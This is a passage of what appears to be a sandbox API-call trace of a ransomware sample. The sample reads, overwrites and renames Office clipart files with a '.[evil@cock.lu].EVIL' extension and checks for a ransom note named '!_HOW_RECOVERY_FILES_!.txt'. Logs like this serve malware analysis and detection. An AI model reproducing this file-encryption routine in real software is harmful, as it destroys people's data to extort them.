Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf.[evil@cock.lu].evil")) returned 1 [0110.260] ??_V@YAXPEAX@Z () returned 0x1 [0110.262] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF", dwFileAttributes=0x200) returned 0 [0110.262] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.262] wcsstr (_Str="BL00008_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.262] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 69 [0110.262] wcscmp (_String1="BL00008_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.263] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00008_.WMF") returned 0x0 [0110.263] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 0x45 [0110.263] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30e8, lpOverlapped=0x0) returned 1 [0110.275] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.275] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.275] _errno () returned 0x84b1160840 [0110.275] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.275] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0110.275] CloseHandle (hObject=0x1a8) returned 1 [0110.275] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.275] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.275] __uncaught_exception () returned 0x84b1160800 [0110.275] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.275] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf.[evil@cock.lu].evil")) returned 1 [0110.276] ??_V@YAXPEAX@Z () returned 0x1 [0110.279] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF", dwFileAttributes=0x200) returned 0 [0110.279] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.279] wcsstr (_Str="BL00012_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.279] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 69 [0110.279] wcscmp (_String1="BL00012_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.279] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00012_.WMF") returned 0x0 [0110.279] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 0x45 [0110.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.280] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x265a, lpOverlapped=0x0) returned 1 [0110.290] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.290] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.290] _errno () returned 0x84b1160840 [0110.290] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.290] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2660, lpOverlapped=0x0) returned 1 [0110.291] CloseHandle (hObject=0x1a8) returned 1 [0110.291] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.291] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.291] __uncaught_exception () returned 0x84b1160800 [0110.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf.[evil@cock.lu].evil")) returned 1 [0110.292] ??_V@YAXPEAX@Z () returned 0x1 [0110.294] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF", dwFileAttributes=0x200) returned 0 [0110.295] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.295] wcsstr (_Str="BL00045_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.295] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 69 [0110.295] wcscmp (_String1="BL00045_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00045_.WMF") returned 0x0 [0110.295] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 0x45 [0110.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.297] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1eb6, lpOverlapped=0x0) returned 1 [0110.321] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.321] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.321] _errno () returned 0x84b1160840 [0110.321] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.321] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ec0, lpOverlapped=0x0) returned 1 [0110.321] CloseHandle (hObject=0x1a8) returned 1 [0110.321] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.322] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.322] __uncaught_exception () returned 0x84b1160800 [0110.322] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.322] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf.[evil@cock.lu].evil")) returned 1 [0110.323] ??_V@YAXPEAX@Z () returned 0x1 [0110.325] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF", dwFileAttributes=0x200) returned 0 [0110.325] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.325] wcsstr (_Str="BL00098_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.325] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 69 [0110.325] wcscmp (_String1="BL00098_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.325] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00098_.WMF") returned 0x0 [0110.325] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 0x45 [0110.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.327] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3f4, lpOverlapped=0x0) returned 1 [0110.330] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.330] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.330] _errno () returned 0x84b1160840 [0110.330] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.330] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x400, lpOverlapped=0x0) returned 1 [0110.330] CloseHandle (hObject=0x1a8) returned 1 [0110.330] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.330] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.330] __uncaught_exception () returned 0x84b1160800 [0110.330] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.330] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf.[evil@cock.lu].evil")) returned 1 [0110.331] ??_V@YAXPEAX@Z () returned 0x1 [0110.334] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF", dwFileAttributes=0x200) returned 0 [0110.334] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.334] wcsstr (_Str="BL00105_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.334] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 69 [0110.334] wcscmp (_String1="BL00105_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.334] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00105_.WMF") returned 0x0 [0110.334] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 0x45 [0110.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.336] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x370, lpOverlapped=0x0) returned 1 [0110.338] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.338] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.338] _errno () returned 0x84b1160840 [0110.338] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.338] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x380, lpOverlapped=0x0) returned 1 [0110.338] CloseHandle (hObject=0x1a8) returned 1 [0110.339] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.339] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.339] __uncaught_exception () returned 0x84b1160800 [0110.339] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.339] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf.[evil@cock.lu].evil")) returned 1 [0110.340] ??_V@YAXPEAX@Z () returned 0x1 [0110.342] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF", dwFileAttributes=0x200) returned 0 [0110.342] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.342] wcsstr (_Str="BL00122_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.342] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 69 [0110.342] wcscmp (_String1="BL00122_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.342] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00122_.WMF") returned 0x0 [0110.342] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 0x45 [0110.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.344] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27a2, lpOverlapped=0x0) returned 1 [0110.357] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.357] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.357] _errno () returned 0x84b1160840 [0110.357] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.357] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27c0, lpOverlapped=0x0) returned 1 [0110.357] CloseHandle (hObject=0x1a8) returned 1 [0110.358] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.358] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.358] __uncaught_exception () returned 0x84b1160800 [0110.358] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.359] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf.[evil@cock.lu].evil")) returned 1 [0110.359] ??_V@YAXPEAX@Z () returned 0x1 [0110.362] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF", dwFileAttributes=0x200) returned 0 [0110.362] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.362] wcsstr (_Str="BL00130_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.362] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 69 [0110.362] wcscmp (_String1="BL00130_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.362] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00130_.WMF") returned 0x0 [0110.362] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 0x45 [0110.362] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.364] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b8, lpOverlapped=0x0) returned 1 [0110.373] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.373] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.373] _errno () returned 0x84b1160840 [0110.373] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.373] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0110.373] CloseHandle (hObject=0x1a8) returned 1 [0110.373] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.374] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.374] __uncaught_exception () returned 0x84b1160800 [0110.374] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.374] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf.[evil@cock.lu].evil")) returned 1 [0110.375] ??_V@YAXPEAX@Z () returned 0x1 [0110.377] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF", dwFileAttributes=0x200) returned 0 [0110.378] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.378] wcsstr (_Str="BL00148_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.378] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 69 [0110.378] wcscmp (_String1="BL00148_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.378] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00148_.WMF") returned 0x0 [0110.378] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 0x45 [0110.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.380] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6a0, lpOverlapped=0x0) returned 1 [0110.394] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.394] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.394] _errno () returned 0x84b1160840 [0110.394] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.394] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6c0, lpOverlapped=0x0) returned 1 [0110.394] CloseHandle (hObject=0x1a8) returned 1 [0110.394] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.395] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.395] __uncaught_exception () returned 0x84b1160800 [0110.395] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.395] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf.[evil@cock.lu].evil")) returned 1 [0110.395] ??_V@YAXPEAX@Z () returned 0x1 